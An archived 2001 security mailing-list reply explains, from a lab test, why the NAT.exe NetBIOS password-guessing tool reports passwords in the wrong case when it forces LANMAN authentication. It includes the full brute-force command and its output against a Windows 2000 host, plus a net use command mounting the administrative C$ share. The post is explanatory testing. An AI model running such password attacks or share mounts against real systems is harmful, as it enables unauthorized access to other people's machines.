Re: Using Null Session information from NAT.EXE

From: Windex King (WindexKing@mor-lan-d.com)
Date: Thu Nov 01 2001 - 10:36:15 PST

Next message: pmawsonat_private: "RE: Extracting NT password hashes from registry export file"

Previous message: morgan.wemanisat_private: "Re: NAI ePolicy Orchestrator"
Next in thread: Shawn Duffy: "How to sniff packets from afar?"
Next in thread: bluefur0r bluefur0r: "Re: Using Null Session information from NAT.EXE"
Reply: Shawn Duffy: "How to sniff packets from afar?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Ian,

I have tested a hunch I had about this and I 
believe this is the answer you're looking for.

Attacking machine: NT 4.0 SP6a
Attacked machine:  W2K no SP

First I confirmed the administrator password 
on the to be attacked machine.

C:\>net user administrator "WindexKing"
The command completed successfully.

** Note: pwd contains capital letters W and K **

Then I attacked using NAT.exe

C:\>nat -o WindexKing.log -u administrator.txt -p WindexKing.pwd 192.168.68.33
[*]--- Reading usernames from administrator.txt
[*]--- Reading passwords from WindexKing.pwd

[*]--- Checking host: 192.168.68.33
[*]--- Obtaining list of remote NetBIOS names

[*]--- Attempting to connect with name: *
[*]--- Unable to connect

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Thu Nov 01 07:49:30 2001
[*]--- Timezone is UTC-5.0
[*]--- Remote server wants us to encrypt, telling it not to

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `AdminIstrator' Password: `foo'
[*]--- Attempting to connect with Username: `AdminIstrator' Password: `bar'
[*]--- Attempting to connect with Username: `AdminIstrator' Password: `windexking'
[*]--- CONNECTED: Username: `AdminIstrator' Password: `windexking'

Now I tried to use the password found by NAT.exe via net.exe

c:\>net use * \\192.168.68.33\c$ "windexking" /u:administrator
System error 1326 has occurred.

Logon failure: unknown user name or bad password.


c:\>net use * \\192.168.68.33\c$ "WindexKing" /u:administrator
Drive E: is now connected to \\192.168.68.33\c$.

The command completed successfully.


My conclusion:

NAT.exe is forcing LANMAN only authentication and therefore the 
letters taken from the supplied wordlist are converted to uppercase
as LANMAN expects.

NAT.exe doesn't tell you that (other than the "Attempting to connect 
with protocol: MICROSOFT NETWORKS 1.03" line) and simply reports the
word from the wordlist which worked as it is presented in the wordlist.

You can find a Cygwin compiled version of the SAMBA SMBclient at:
http://www.hoobie.net/tools/index.html

W	K

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: pmawsonat_private: "RE: Extracting NT password hashes from registry export file"
Previous message: morgan.wemanisat_private: "Re: NAI ePolicy Orchestrator"
Next in thread: Shawn Duffy: "How to sniff packets from afar?"
Next in thread: bluefur0r bluefur0r: "Re: Using Null Session information from NAT.EXE"
Reply: Shawn Duffy: "How to sniff packets from afar?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Nov 01 2001 - 12:08:25 PST